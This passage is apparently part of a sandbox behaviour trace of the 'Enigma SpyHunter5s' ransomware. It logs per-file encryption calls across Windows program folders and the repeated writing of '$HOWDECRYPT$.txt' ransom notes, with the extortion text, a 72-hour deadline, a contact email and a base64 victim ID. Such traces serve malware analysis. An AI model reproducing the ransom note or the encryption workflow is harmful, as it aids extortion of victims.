(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.972] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e8ec, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e8ec*=0x2ac, lpOverlapped=0x0) returned 1 [0161.972] CloseHandle (hObject=0x178) returned 1 [0161.972] GetProcessHeap () returned 0x2c0000 [0161.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaeeb8 | out: hHeap=0x2c0000) returned 1 [0161.972] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e888 | out: pbBuffer=0x248e888) returned 1 [0161.973] GetProcessHeap () returned 0x2c0000 [0161.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.973] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e880*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e880*=0x30) returned 1 [0161.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single_bkg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.058] GetProcessHeap () returned 0x2c0000 [0162.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.058] GetProcessHeap () returned 0x2c0000 [0162.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb6590 | out: hHeap=0x2c0000) returned 1 [0162.058] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e888 | out: pbBuffer=0x248e888) returned 1 [0162.058] GetProcessHeap () returned 0x2c0000 [0162.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.058] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e880*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e880*=0x30) returned 1 [0162.059] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_bkg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.074] GetProcessHeap () returned 0x2c0000 [0162.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.074] GetProcessHeap () returned 0x2c0000 [0162.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb6248 | out: hHeap=0x2c0000) returned 1 [0162.074] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e880 | out: pbBuffer=0x248e880) returned 1 [0162.074] GetProcessHeap () returned 0x2c0000 [0162.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.074] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e878*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e878*=0x30) returned 1 [0162.074] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\icon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.077] GetProcessHeap () returned 0x2c0000 [0162.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.077] GetProcessHeap () returned 0x2c0000 [0162.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb2638 | out: hHeap=0x2c0000) returned 1 [0162.077] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e880 | out: pbBuffer=0x248e880) returned 1 [0162.077] GetProcessHeap () returned 0x2c0000 [0162.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.077] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e878*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e878*=0x30) returned 1 [0162.077] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\gadget.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.233] GetProcessHeap () returned 0x2c0000 [0162.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.233] GetProcessHeap () returned 0x2c0000 [0162.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecf820 | out: hHeap=0x2c0000) returned 1 [0162.233] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\css\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.234] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.234] WriteFile (in: hFile=0x178, lpBuffer=0x248e7af*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e8d8, lpOverlapped=0x0 | out: lpBuffer=0x248e7af*, lpNumberOfBytesWritten=0x248e8d8*=0x127, lpOverlapped=0x0) returned 1 [0162.235] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.235] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e8d8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e8d8*=0x2ac, lpOverlapped=0x0) returned 1 [0162.235] CloseHandle (hObject=0x178) returned 1 [0162.235] GetProcessHeap () returned 0x2c0000 [0162.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eab268 | out: hHeap=0x2c0000) returned 1 [0162.235] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e878 | out: pbBuffer=0x248e878) returned 1 [0162.235] GetProcessHeap () returned 0x2c0000 [0162.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.236] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e870*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e870*=0x30) returned 1 [0162.236] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\calendar.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\css\\calendar.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.256] GetProcessHeap () returned 0x2c0000 [0162.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.256] GetProcessHeap () returned 0x2c0000 [0162.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eae6b8 | out: hHeap=0x2c0000) returned 1 [0162.256] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e870 | out: pbBuffer=0x248e870) returned 1 [0162.256] GetProcessHeap () returned 0x2c0000 [0162.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.256] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e868*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e868*=0x30) returned 1 [0162.256] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoBase.dll" (normalized: "c:\\program files (x86)\\windows photo viewer\\photobase.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.263] GetProcessHeap () returned 0x2c0000 [0162.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.263] GetProcessHeap () returned 0x2c0000 [0162.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84740 | out: hHeap=0x2c0000) returned 1 [0162.263] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e870 | out: pbBuffer=0x248e870) returned 1 [0162.263] GetProcessHeap () returned 0x2c0000 [0162.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.263] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e868*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e868*=0x30) returned 1 [0162.263] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\imagingdevices.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.263] GetProcessHeap () returned 0x2c0000 [0162.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.263] GetProcessHeap () returned 0x2c0000 [0162.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eebdd0 | out: hHeap=0x2c0000) returned 1 [0162.264] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e868 | out: pbBuffer=0x248e868) returned 1 [0162.264] GetProcessHeap () returned 0x2c0000 [0162.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.264] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e860*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e860*=0x30) returned 1 [0162.264] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\congressional_prohibited_lone.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\congressional_prohibited_lone.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.264] GetProcessHeap () returned 0x2c0000 [0162.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.264] GetProcessHeap () returned 0x2c0000 [0162.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecf730 | out: hHeap=0x2c0000) returned 1 [0162.264] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows nt\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.270] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.270] WriteFile (in: hFile=0x178, lpBuffer=0x248e79b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e8c4, lpOverlapped=0x0 | out: lpBuffer=0x248e79b*, lpNumberOfBytesWritten=0x248e8c4*=0x127, lpOverlapped=0x0) returned 1 [0162.270] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.270] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e8c4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e8c4*=0x2ac, lpOverlapped=0x0) returned 1 [0162.271] CloseHandle (hObject=0x178) returned 1 [0162.271] GetProcessHeap () returned 0x2c0000 [0162.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1a98 | out: hHeap=0x2c0000) returned 1 [0162.271] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e860 | out: pbBuffer=0x248e860) returned 1 [0162.271] GetProcessHeap () returned 0x2c0000 [0162.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.271] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e858*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e858*=0x30) returned 1 [0162.271] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.274] GetProcessHeap () returned 0x2c0000 [0162.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.275] GetProcessHeap () returned 0x2c0000 [0162.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eab058 | out: hHeap=0x2c0000) returned 1 [0162.275] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e860 | out: pbBuffer=0x248e860) returned 1 [0162.275] GetProcessHeap () returned 0x2c0000 [0162.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.275] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e858*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e858*=0x30) returned 1 [0162.275] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceArray.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicearray.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.275] GetProcessHeap () returned 0x2c0000 [0162.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.275] GetProcessHeap () returned 0x2c0000 [0162.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecf640 | out: hHeap=0x2c0000) returned 1 [0162.275] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e858 | out: pbBuffer=0x248e858) returned 1 [0162.275] GetProcessHeap () returned 0x2c0000 [0162.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.275] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e850*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e850*=0x30) returned 1 [0162.275] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceAmharic.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextserviceamharic.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.275] GetProcessHeap () returned 0x2c0000 [0162.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.276] GetProcessHeap () returned 0x2c0000 [0162.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecf550 | out: hHeap=0x2c0000) returned 1 [0162.276] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e858 | out: pbBuffer=0x248e858) returned 1 [0162.276] GetProcessHeap () returned 0x2c0000 [0162.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0162.276] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e850*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e850*=0x30) returned 1 [0162.276] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextService.dll" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservice.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.276] GetProcessHeap () returned 0x2c0000 [0162.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0162.276] GetProcessHeap () returned 0x2c0000 [0162.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb22b8 | out: hHeap=0x2c0000) returned 1 [0162.276] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0162.307] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.307] WriteFile (in: hFile=0x178, lpBuffer=0x248e787*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e8b0, lpOverlapped=0x0 | out: lpBuffer=0x248e787*, lpNumberOfBytesWritten=0x248e8b0*=0x127, lpOverlapped=0x0) returned 1 [0162.308] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.308] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e8b0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e8b0*=0x2ac, lpOverlapped=0x0) returned 1 [0162.308] CloseHandle (hObject=0x178) returned 1 [0162.308] GetProcessHeap () returned 0x2c0000 [0162.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eebb18 | out: hHeap=0x2c0000) returned 1 [0162.308] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e850 | out: pbBuffer=0x248e850) returned 1 [0162.309] GetProcessHeap () returned 0x2c0000 [0162.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0162.309] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248e848*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248e848*=0x30) returned 1 [0162.309] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_48.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.309] GetProcessHeap () returned 0x2c0000 [0162.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0162.309] GetProcessHeap () returned 0x2c0000 [0162.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb20f8 | out: hHeap=0x2c0000) returned 1 [0162.310] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e848 | out: pbBuffer=0x248e848) returned 1 [0162.310] GetProcessHeap () returned 0x2c0000 [0162.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0162.310] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248e840*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248e840*=0x30) returned 1 [0162.310] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_48.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.310] GetProcessHeap () returned 0x2c0000 [0162.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0162.310] GetProcessHeap () returned 0x2c0000 [0162.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb2018 | out: hHeap=0x2c0000) returned 1 [0162.310] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, 